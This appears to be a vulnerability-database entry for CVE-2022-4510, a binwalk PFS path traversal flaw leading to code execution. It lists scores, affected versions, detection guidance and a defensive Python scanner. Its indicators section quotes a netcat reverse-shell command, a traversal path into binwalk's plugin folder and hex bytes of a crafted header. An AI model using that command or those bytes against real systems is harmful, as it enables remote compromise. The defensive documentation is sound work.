CVE-2022-4510
published 2023-01-26

Priority P260 · high · 7.8 (CVSS 3.1)
Vector: AV:L / AC:L / PR:N / UI:R / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 21.84% (97.3th percentile)

A path traversal vulnerability was identified in ReFirm Labs binwalk from version 2.1.2b through 2.3.3 inclusive. By crafting a malicious PFS filesystem file, an attacker can get binwalk's PFS extractor to extract files at arbitrary locations when binwalk is run in extraction mode (-e option). Remote code execution can be achieved by building a PFS filesystem that, upon extraction, would extract a malicious binwalk module into the folder .config/binwalk/plugins. This vulnerability is associated with program files src/binwalk/plugins/unpfs.py. This issue affects binwalk from 2.1.2b through 2.3.3 inclusive.

Affected

7 ranges
Vendor | Product | Version range | Fixed in
debian | binwalk | < binwalk 2.3.4+dfsg1-1 (bookworm) | binwalk 2.3.4+dfsg1-1 (bookworm)
microsoft | binwalk | >= 0 < 2.3.1+dfsg1-1+deb11u1 | 2.3.1+dfsg1-1+deb11u1
microsoft | binwalk | >= 0 < 2.3.4+dfsg1-1 | 2.3.4+dfsg1-1
microsoft | binwalk | >= 0 < 2.3.4+dfsg1-1 | 2.3.4+dfsg1-1
microsoft | binwalk | >= 0 < 2.3.4+dfsg1-1 | 2.3.4+dfsg1-1
microsoft | binwalk | 2.1.2b – 2.3.3 |
microsoft | binwalk | >= 2.2.0 < 2.3.3 | 2.3.3

Detection & IOCs (extracted from sources)

filename: binwalk_exploit.png
path: .config/binwalk/plugins
path: src/binwalk/plugins/unpfs.py
path: /tmp/.binwalk
command: nc <ip> <port> -e /bin/bash 2>/dev/null &
path: ../../../.config/binwalk/plugins/binwalk.py
bytes:
5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e
  • Detect malicious PFS filesystem header prepended to a PNG file: look for the magic bytes 'PFS/0.9' (hex: 5046532f302e39) followed by a path traversal sequence targeting .config/binwalk/plugins/
  • Alert on creation of files under .config/binwalk/plugins/ during binwalk extraction (-e), especially Python (.py) files, which indicates path traversal exploitation of CVE-2022-4510
  • Monitor for binwalk spawning outbound nc (netcat) processes with '-e /bin/bash', which is the RCE payload delivered via the malicious plugin
  • Monitor for creation of the sentinel file /tmp/.binwalk, which the exploit uses to track whether the payload has already executed
  • Flag binwalk invocations in extraction mode (-e) on files dropped into monitored directories (e.g. /var/www/pilgrimage.htb/shrunk/) by privileged processes, as this is the trigger path for exploitation
  • The vulnerability only triggers when binwalk is run in extraction mode; passive scanning without -e is not exploitable
  • Affected version range is 2.1.2b through 2.3.3 inclusive; versions 2.3.4+dfsg1-1 and later are patched
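
A static triage check for the first detection item above, as an added example (not code from binwalk or from the sources this page quotes): it finds the PFS/0.9 magic anywhere in a file and flags printable names after it that resolve above the extraction directory. It is a byte-level heuristic, not a PFS parser; the 4096-byte window, the function names and the sample input are assumptions made for the example.

```python
import posixpath
import re

MAGIC = b"PFS/0.9"                         # magic bytes from the detection note
PLUGIN_DIR = ".config/binwalk/plugins"     # plugin folder named in the advisory
WINDOW = 4096                              # assumption: bytes after the magic to inspect
NAME_RE = re.compile(rb"[\x20-\x7e]{3,}")  # printable runs = candidate entry names


def escapes_root(name: str) -> bool:
    """True if `name`, joined to an extraction directory, resolves above it."""
    norm = posixpath.normpath(name.replace("\\", "/"))
    return norm == ".." or norm.startswith("../")


def scan(data: bytes) -> list:
    """Return one finding per traversal-style name found after a PFS magic."""
    findings = []
    pos = data.find(MAGIC)
    while pos != -1:
        start = pos + len(MAGIC)
        for m in NAME_RE.finditer(data[start:start + WINDOW]):
            name = m.group().decode("ascii")
            if escapes_root(name):
                norm = posixpath.normpath(name.replace("\\", "/"))
                findings.append({"magic_offset": pos, "name": name,
                                 "targets_plugin_dir": PLUGIN_DIR in norm})
        pos = data.find(MAGIC, pos + 1)   # keep going: the magic may appear more than once
    return findings


def constructed_sample(name: bytes) -> bytes:
    """Constructed test input: PNG signature, padding, magic, one name field (no file content)."""
    png_sig = b"\x89PNG\r\n\x1a\n"
    return png_sig + b"\x00" * 32 + MAGIC + b"\x00" * 7 + b"\x01\x00" + name.ljust(128, b"\x00")


if __name__ == "__main__":
    for n in (b"../../../.config/binwalk/plugins/binwalk.py", b"docs/../readme.txt"):
        print(n.decode(), "->", scan(constructed_sample(n)))
```

A name such as docs/../readme.txt contains ".." but stays inside the extraction directory after normalisation, so it is not reported.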

CVSS provenance

nvd | v3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
osv | 7.8 | HIGH
vendor_debian | 7.8 | HIGH